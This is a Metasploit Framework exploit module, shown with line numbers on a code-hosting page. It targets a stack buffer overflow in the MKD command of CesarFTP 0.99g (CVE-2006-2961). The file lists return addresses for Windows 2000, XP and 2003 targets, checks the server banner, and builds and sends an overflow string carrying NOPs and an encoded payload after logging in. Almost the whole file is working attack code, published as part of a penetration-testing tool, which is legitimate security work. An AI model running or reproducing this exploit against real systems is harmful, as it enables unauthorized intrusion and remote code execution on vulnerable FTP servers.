Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/cesarftp_mkd.rb
19566 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Ftp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Cesar FTP 0.99g MKD Command Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g.

18


19
          You must have valid credentials to trigger this vulnerability. Also, you

20
          only get one chance, so choose your target carefully.

21
        },

22
        'Author' => 'MC',

23
        'License' => MSF_LICENSE,

24
        'References' => [

25
          [ 'CVE', '2006-2961'],

26
          [ 'OSVDB', '26364'],

27
          [ 'BID', '18586'],

28
          [ 'URL', 'http://web.archive.org/web/20060619195555/http://secunia.com:80/advisories/20574/' ],

29
        ],

30
        'Privileged' => true,

31
        'DefaultOptions' => {

32
          'EXITFUNC' => 'process',

33
        },

34
        'Payload' => {

35
          'Space' => 250,

36
          'BadChars' => "\x00\x20\x0a\x0d",

37
          'StackAdjustment' => -3500,

38
          'Compat' =>

39
                        {

40
                          'SymbolLookup' => 'ws2ord',

41
                        }

42
        },

43
        'Platform' => 'win',

44
        'Targets' => [

45
          [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e14c29 } ],

46
          [ 'Windows 2000 Pro SP4 French', { 'Ret' => 0x775F29D0 } ],

47
          [ 'Windows XP SP2/SP3 English', { 'Ret' => 0x774699bf } ], # jmp esp, user32.dll

48
          # [ 'Windows XP SP2 English',       { 'Ret' => 0x76b43ae0 } ], # jmp esp, winmm.dll

49
          # [ 'Windows XP SP3 English',       { 'Ret' => 0x76b43adc } ], # jmp esp, winmm.dll

50
          [ 'Windows 2003 SP1 English', { 'Ret' => 0x76AA679b } ],

51
        ],

52
        'DisclosureDate' => '2006-06-12',

53
        'DefaultTarget' => 0,

54
        'Notes' => {

55
          'Reliability' => UNKNOWN_RELIABILITY,

56
          'Stability' => UNKNOWN_STABILITY,

57
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

58
        }

59
      )

60
    )

61
  end

62


63
  def check

64
    connect

65
    disconnect

66


67
    if (banner =~ /CesarFTP 0\.99g/)

68
      return Exploit::CheckCode::Appears

69
    end

70


71
    return Exploit::CheckCode::Safe

72
  end

73


74
  def exploit

75
    c = connect_login

76
    return if not c

77


78
    sploit = "\n" * 671 + rand_text_english(3, payload_badchars)

79
    sploit << [target.ret].pack('V') + make_nops(40) + payload.encoded

80


81
    print_status("Trying target #{target.name}...")

82


83
    send_cmd(['MKD', sploit], false)

84


85
    handler

86
    disconnect

87
  end

88
end

89


90